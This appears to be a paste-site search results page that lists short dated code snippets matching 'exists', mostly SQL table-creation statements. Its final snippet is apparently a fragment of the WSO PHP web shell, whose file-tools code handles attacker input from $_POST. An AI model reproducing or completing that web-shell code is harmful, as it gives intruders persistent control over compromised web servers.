42.7K results in 830 ms
8 years ago · Dec 09, 2017, 10:30 PM
USE `kdict2` ; -- ----------------------------------------------------- -- Table `kdict2`.`word_type` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `kdict2`.`word_type` ( `id` INT UNSIGNED
8 years ago · Dec 09, 2017, 09:30 PM
try { final String query = "CREATE TABLE IF NOT EXISTS statuspvp (UUID VARCHAR(255), Nick
8 years ago · Dec 09, 2017, 09:12 PM
flirt signatures AF_PROCPTR = 0x0080 # Create function if data xref data->code32 exists AF_JFUNC = 0x0100 # Rename jump
8 years ago · Dec 09, 2017, 08:58 PM
3739 D wpa_supplicant: ctrl_iface exists, but does not allow connections - assuming it
8 years ago · Dec 09, 2017, 08:38 PM
CREATE TABLE IF NOT EXISTS `announcement` ( `id` int(255) NOT
8 years ago · Dec 09, 2017, 08:24 PM
String @ 597 STR: /& SQL: CREATE TABLE IF NOT EXISTS `announcement` ( `id` int(255) NOT
8 years ago · Dec 09, 2017, 08:24 PM
hit a character part --]] if (not game.Workspace:FindFirstChild("ignoreModel_".._G.ignoreCode)) then local ignoreModel
8 years ago · Dec 09, 2017, 08:24 PM
CREATE TABLE IF NOT EXISTS `announcement` ( `id` int(255) NOT
8 years ago · Dec 09, 2017, 07:50 PM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
8 years ago · Dec 09, 2017, 07:46 PM
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} //Receieve query for create table structure $res = mysql_query("SHOW
8 years ago · Dec 09, 2017, 07:28 PM
TABLE `file` ( `text` LONGBLOB NOT NULL );") or die ("cannot create table: ".mysql_error()); mysql_query("LOAD DATA INFILE
8 years ago · Dec 09, 2017, 07:00 PM
if exists tp11 cascade; create schema if not exists tp11; -- Exercice 1 : ------------------------------------------------------------ -- Table: Recette ------------------------------------------------------------ CREATE TABLE tp11.Recette(
8 years ago · Dec 09, 2017, 07:00 PM
if exists tp11 cascade; create schema if not exists tp11; -- Exercice 1 : ------------------------------------------------------------ -- Table: Recette ------------------------------------------------------------ CREATE TABLE tp11.Recette(
8 years ago · Dec 09, 2017, 06:16 PM
for `gangs` -- ---------------------------- DROP TABLE IF EXISTS `gangs`; CREATE TABLE `gangs` ( `id` int(6) NOT NULL AUTO_INCREMENT, `owner` varchar(32)
8 years ago · Dec 09, 2017, 05:24 PM
FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask. org.apache.thrift.transport.TTransportException CREATE EXTERNAL TABLE IF NOT EXISTS Accesslogs(....
8 years ago · Dec 09, 2017, 05:12 PM
references station_data(StationIncrementalID) ) on [SECONDARY] if object_id('tmpdb..station_average') is null create table #station_average( Station int ,[Year]
8 years ago · Dec 09, 2017, 04:30 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
Total pages: 2134